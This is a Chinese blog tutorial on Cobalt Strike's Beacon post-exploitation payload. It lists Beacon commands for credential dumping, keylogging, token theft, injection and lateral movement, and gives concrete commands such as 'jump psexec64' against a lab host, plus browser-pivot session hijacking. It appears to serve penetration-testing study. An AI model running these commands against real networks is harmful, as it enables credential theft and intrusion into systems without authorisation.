cobalt strike之Beacon的使用(七)

于 2025-03-20 16:50:34 发布
阅读量918 收藏 12
点赞数 11
分类专栏: 内网渗透 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_78851087/article/details/146401136
版权

Beacon是Cobalt Strike为高级攻击者建模的Payload。使用Beacon通过HTTP,HTTPS或DNS出口网 络。而且Beacon非常灵活,支持异步和交互式通信。异步通信既低又慢。Beacon将通讯本地,下载任 务,然后进入睡眠状态。交互式通信实时发生。

beacon种的命令

Command                   Description
   -------                   -----------
   argue                     命令行参数欺骗
   blockdlls                 禁止子进程加载非微软签名的dll
   browserpivot             注入浏览器进程代理用户已认证身份(仅支持IE)
   cancel                   取消正在下载的文件
   cd                       跳转目录
   checkin                   强制目标回连并更新状态(用于DNS上线,DNS模式下无新任务时目标
不会回连Teamserver)
   chromedump               提取Chrome保存的账号密码、Cookies等信息
   clear                     清空beacon任务队列
   connect                   通过TCP正向连接远程Beacon
   covertvpn                 部署Covert VPN客户端
   cp                       复制文件
   dcsync                   从域控提取密码hash
   desktop                   远程VNC控制用户桌面
   dllinject                 注入一个内存反射加载的dll到目标进程
   dllload                   使用LoadLibrary方式在目标进程中加载一个dll
   download                 下载文件
   downloads                 列出所有正在下载的文件
   drives                   列出所有磁盘盘符
   elevate                   利用提权漏洞获取一个高权限Beacon
   execute                   在目标上执行程序(无回显)
   execute-assembly         在目标上内存加载执行本地.NET程序
   exit                     结束当前Beacon会话
   getprivs                 在当前进程访问令牌(access token)中启用system特权
   getsystem                 尝试获取SYSTEM用户权限
   getuid                   获取当前进程访问令牌(access token)的用户信息
   hashdump                 获取本地用户hash
   help                     帮助信息
   inject                   在指定进程中注入新的Beacon会话
   inline-execute           在当前会话中执行Beacon Object File
   jobkill                   结束一个后台任务
   jobs                     列出所有后台任务
   jump                     在远程机器上植入Beacon(横向移动)
   kerberos_ccache_use       从ccache文件导入kerberos票据到当前会话中
   kerberos_ticket_purge     清空当前会话中的所有kerberos票据
   kerberos_ticket_use       从ticket文件中导入kerberos票据到当前会话中
   keylogger                 开启键盘记录
   kill                     结束指定进程
   link                     通过命名管道正向连接远程Beacon
   logonpasswords           使用mimikatz获取密码和hash
   ls                       列出目录文件
   make_token               创建进程访问令牌(access token),仅用于访问网络资源
   mimikatz                 运行mimikatz
   mkdir                     创建目录
   mode dns                 使用DNS A记录作为数据通道(仅支持DNS上线Beacon)
   mode dns-txt             使用DNS TXT记录作为数据通道(仅支持DNS上线Beacon)
   mode dns6                 使用DNS AAAA记录作为数据通道(仅支持DNS上线Beacon)
   mv                       移动文件
   net                       网络和主机探测工具(内置net命令)
   note                     给当前会话添加备注信息
   portscan                 网络端口扫描
   powerpick                 内存执行Powershell命令(不调用powershell.exe)
   powershell               通过powershell.exe执行Powershell命令
   powershell-import         导入本地powershell脚本到当前会话中
   ppid                     为所有新运行的进程设置伪造的父进程PID
   printscreen               使用PrintScr方式截屏
   ps                       显示进程列表
   psinject                 注入到指定进程后在内存中执行Powershell命令(不调用
powershell.exe)
   pth                       使用Mimikatz执行Pass-the-hash
   pwd                       显示当前目录
   reg                       查询注册表
   remote-exec               在远程机器上执行命令(横向移动)
   rev2self                 恢复原始进程访问令牌(access token)
   rm                       删除文件或文件夹
   rportfwd                 反向端口转发(从Cobalt Strike Teamserver发起连接)
   rportfwd_local           反向端口转发(从Cobalt Strike客户端发起连接)
   run                       在目标上执行程序(有回显)
   runas                     以另一个用户身份执行程序
   runasadmin               以高权限执行程序
   runu                     以另一个进程PID作为父进程PID,并以其用户身份执行程序
   screenshot               截屏
   screenwatch               屏幕监控,每隔一段时间截屏
   setenv                   设置环境变量
   shell                     使用cmd.exe执行命令
   shinject                 注入shellcode到指定进程中
   shspawn                   创建傀儡进程并注入shellcode到其中运行
   sleep                     设置beacon回连间隔时间
   socks                     启动SOCKS4a代理服务器
   socks stop               停止SOCKS4a代理服务器
   spawn                     创建一个新Beacon会话
   spawnas                   以另一个用户身份创建一个新Beacon会话
   spawnto                   设置创建新进程时使用的可执行文件路径(傀儡进程的宿主exe文件
路径)
   spawnu                   以另一个进程PID作为父进程PID,并以其用户身份创建一个新
Beacon会话
   spunnel                   运行第三方agent shellcode并将其反向代理到控制端(从Cobalt 
Strike Teamserver发起连接)
   spunnel_local             运行第三方agent shellcode并将其反向代理到控制端(从Cobalt 
Strike客户端发起连接)
   ssh                       通过SSH连接远程主机(使用账号密码认证)
   ssh-key                   通过SSH连接远程主机(使用证书私钥认证)
   steal_token               从指定进程中窃取访问令牌(access token)
   timestomp                 复制B文件的创建、访问、修改时间戳到A文件(文件时间戳伪造)
   unlink                   断开与beacon的连接(用于通过TCP、命名管道连接的beacon)
   upload                   上传文件

在Cobalt Strike中它的心跳默认是60s(即sleep时间为60s,每一分钟目标主机与teamserver通信一次),这会让我们执行命令或进行其他操作响应很慢一般设置 sleep 5 即可,

如果使用socks代理设置为 sleep 0

在beacon不能直接使用系统命令想要执行系统命令需要使用 shell 命令

SMB beacon

官网介绍:SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从 父Beacon获取到任务并发送。

因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相 对隐蔽,绕防火墙时可能发挥奇效。

这张图很好的诠释了SMB beacon的工作流程

这种beacon要求具有SMB Beacon的主机必须接受端口445上的连接.

派生一个SMB Beacon方法:在Listner生成SMB Beacon>目标主机>右键> spawn as>选中对应的 Listener>上线

或在beacon中使用命令spawn smb(smb为我的smb listener名字)

运行成功后外部可以看到∞∞这个字符,这就是派生的SMB Beacon。

当前是连接状态,你可以Beacon上用link 命令链接他或者unlink 命令断开它。

这种beacon在内网横向渗透中运用的很多,横向渗透留到日后再讲。在内网环境中可以使用ipc $生成的 SMB Beacon上传到目标主机执行,但是目标主机并不会直接上线的,需要我们自己用链接命令(link )去 连接他。

当前连接12server5 因为密码与12server4相同 dir可以访问 12server5 c盘可以使用jump psexec64建 立smb beacon

shell dir \\10.10.10.139\c$ #访问目标c盘
jump psexec64 \\10.10.10.139 smb 创建smb连接

7.1 截图

可以在beacon里输入命令

7.2 端口扫描

流 量 探 测 端 口 扫 描 选 择 扫 描 存 活 的 方 式 a r p ic m p 选 择 扫 描 的 网 卡 也 可 以 指 定 端 口

在beacon 使用命令查看后台任务jobs关闭任务jobkill 任务id

7.3 网络探测

beacon 提供net命令以下是这个命令的一些常用方法

beacon> help net
Use: net [命令] [参数]
Beacon内置的主机和网络枚举探测工具。 支持的 [命令] 列表有:
       命令                 描述
       -------             -----------
       computers           列出域中的主机(通过组)
       domain             显示该主机的域
       dclist             列出域控制器
       domain_controllers 列出域控制器(通过组)
       domain_trusts       列出域信任
       group               列出组中的成员组和成员用户
       localgroup         列出本地组中的成员组和成员用户
       logons             列出登录到指定主机的用户
       sessions           列出指定主机上的会话
       share               列出指定主机上的共享
       user               列出用户和用户信息
       time               显示指定主机上的时间
       view               列出域中的主机(通过browser服务)
使用 "help net [命令]" 了解更多信息

查看网络信任主机

列出域控

7.4 浏览器代理

先把beacon 简介时间设置为0 sleep 0

先把 beacon 设为交互模式。因为浏览器跳板是通过 beacon 会话来隧道通信传输数据的,所以 beacon 连接到团队服务器的频率会影响浏览器跳板的同步性。所以要把 beacon 会话设为交互模式来实现最好 的效果

然后设置浏览器跳板代理( agent )。这一步实际上会完成两个任务:

将 agent 程序注入受害机器的 IE 浏览器进程

在团队服务器的一个端口上开启一个 HTTP 代理服务器

实际上,这个过程也可以通过browserpivot命令来实现。效果是等同的。停止方式 browserpivot stop

如果目标上登录某些网站通过设置浏览器代理后,访问网站即可登录

访问目标网站

Cyberchef实战之-Cobalt Strike beacon 还原揭秘
村中少年的专栏
07-27 730
通过cyberchef分析一段使用了base64,压缩,xor,charcode等多种方式的Cobalt Strike beacon样本,为护网HVV,重保互动,日常网络安全运营分析,提供参考思路
CobaltStrike之DNS beacon
问题很多的小明
05-29 3079
DNS beacon 实际意义:红蓝对抗中,可以通过DNS的方式通信,流量更加隐秘,躲避agent/DLP的检测,实现相对隐秘的渗透方式。 环境需要: CobaltStrike + 域名 1 域名解析配置 解析过程如下: 第一步:ns1.xxxxx.com-----ns------>ns.xxxxxx.com 第二部:ns.xxxxx.com------A------->VPS地址 2 CS配置 注意:VPS防火墙53端口一定要开启 解析如下: mac:执行命令 dig +trace ns1
.cobaltstrike.beacon_keys
07-24
.cobaltstrike.beacon_keys
cobalt strike各种beacon的详解(http/https/tcp)
热门推荐
Shanfenglan's blog
08-06 35万+
Beacon Cobalt strike4.0开始就只有这几种beacon,下面对其进行一一讲述,先得创建对应的listener,之后根据创建好的listener生成木马文件,文件运行后返回对应的beacon,至于beacon到底是个什么东西可以看我的这篇文章。这里我们先讲述几种比较简单的易于理解的beacon。 附录 beacon与c2通信逻辑 1.stager的beacon会先下载完整的payload执行,stage则省略这一步 2.beacon进入睡眠状态,结束睡眠状态后用 http-get方
Cobalt StrikeBeacon原理浅析
Ms08067安全实验室
03-06 2182
Hello大家好哇,我是你们可爱的lmn小姐姐,今天我们来研究一下Beacon的一些基础知识,如果有师傅没有看过这个系列之前的文章,可以点击下方图片阅读。Cobalt Strike 作为...
CobaltStrike远控工具beacon使用
weixin_46411728的博客
11-11 587
*
内网渗透神器CobaltStrikeBeacon详解()
xf555er的博客
11-19 1691
这两个beacon的原理是通过发送http请求与受害主机通信来传达命令, 以此实现控制效果优点是传输数据快, 缺点时隐蔽性差, 容易被防火墙或内网审计工具拦截。
Cobalt Strike DNS Beacon使用与原理
yyj1781572的博客
11-17 893
Cobalt Strike DNS Beacon使用与原理
练习 Go 编程并用 Go 实现 CobaltStrikeBeacon.zip
12-03
吉康使用 Go 实现 CobaltStrikeBeacon本项目仅用于学习协议分析和逆向工程,如有侵权请联系我删除本项目,最后请勿非法使用怎么玩设置团队服务器并启动 http 监听器,团队服务器将生成文件.cobaltstrike.beacon_...
CobaltStrike(beacon.dll)样本.zip
10-18
CobaltStrike是一款知名的高级威胁攻击框架,主要被网络安全研究人员和渗透测试人员使用,用于模拟黑客攻击行为,评估网络防御系统的效能。它以其强大的模块化设计和高度隐蔽的通信方式而闻名。在本案例中,我们关注...
cobalt strike笔记-常用beacon命令.pdf
04-03
cobalt strike笔记-常用beacon命令
geacon:练习Go编程并在Go中实现CobaltStrikeBeacon
03-21
盖康 使用Go来实现CobaltStrike的信标 该项目仅用于学习协议分析和逆向工程,如果有人的权利受到侵犯,请与我联系以删除该项目,最后一个请勿非法使用 怎么玩 设置团队服务器并启动http许可,团队服务器将生成文件.cobaltstrike.beacon_keys 。 使用Jetbrains Idea编译BeaconTool,使用命令java -jar BeaconTool.jar将Java密钥库转换为PEM格式。 将RSA密钥对替换为cmd/config/config.go文件(不需要RSA私钥,我在代码中仅出于记录目的写了它) 无论您要运行什么平台,都可以编译geacon:例如,使用命令export GOOS="darwin" && export GOARCH="amd64" && go build cmd/main.go来编译在MacOS上运行的可执行二进制文件。 正玩得开心
Cobalt StrikeBeacon 使用介绍以及 Profile 文件修改Beacon内存教程
W小哥
08-23 4514
1、内存段是rwx权限2、内存中有 beacon 字符串3、内存中有 ReflectiveLoader 字符串。
Cobaltstrike系列教程()beacon详解
J0o1ey Blog
08-01 1万+
0x000–前文 有技术交流或渗透测试培训需求的朋友欢迎联系QQ547006660 2000人网络安全交流群,欢迎大佬们来玩 0x001-Beacon详解 1.Beacon命令 大家通过系列教程()的学习,配置好Listner,让目标机执行我们的Payload/后门程序后,即可发现目标机已经上线 右键目标interact来使用Beacon,我们用它来执行各种命令 ※在Cobalt Stri...
Cobaltstrike学习(二)beacon命令
kang_12358的博客
07-20 6545
Cobaltstrike学习(二)beacon命令 1.Beacon命令 在已经上线的服务器上右击==>打开Beacon,在里面可以执行各种命令 在cs中默认的心跳时间是60s,我们可以用sleep 命令来更改心跳时间(心跳时间是指上线的服务器和cs服务器的通信时间) 心跳时间很长就会响应的时间很慢,但也不能设置的很短,不让很容易会被监测到与cs通信的流量,具体多少可以根据测试环境自己来设置。 在Beacon中执行cmd命令时需要在前面加上shell,例如:shell whoami.
Cobalt Strike系列教程3 beacon详解
weixin_42140534的博客
02-04 1662
0x01 Beacon详解 0x01.1 Beacon 命令 通过系列教程2的学习,配置好Listeners,让目标及执行我们的payload后门程序后,即可发现目标主机已经上线 右键目标选择使用Beacon,我们用它来执行各种命令 == 在Cobalt Strike中他的默认心跳是60s(即sleep时间是60s,每一分钟目标主机与teamserver通信一次)这让我们执行命令或者进行其他操...
大海捞“帧”:Cobalt Strike服务器识别与staging beacon扫描
qq_53058639的博客
08-03 1571
Cobalt Strike 作为一种后渗透工具,可以完成侦察鱼叉式钓鱼浏览器代理等攻击。Cobalt Strike 分为客户端和服务器两部分,服务器端被称之为Team Server。Team Server既是Beacon payload的控制器,也是Cobalt Strike提供社工功能的主机。TeamServer还存储了Cobalt Strike收集的数据以及日志记录。
Cobalt Strike 4.8 用户指南-第十三节 Beacon对象文件
最新发布
YJ_12340的博客
12-10 790
Beacon对象文件(BOF)是一个编译过的C语言程序,其编写规范允许它在Beacon进程中执行并使用Beacon内部API。BOF是一种通过新的后渗透功能快速扩展Beacon代理的方法。BOF有哪些优势?命令和控制平台的关键作用之一是提供使用扩展后渗透功能的方法。已经提供了使用PowerShell.NET和反射DLL的工具。这些工具依赖于耗费资源巨大的 OPSECfork&run模式,该模式需要为每个后渗透操作进行进程创建和注入。BOF的占用空间更轻。它们在Beacon
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值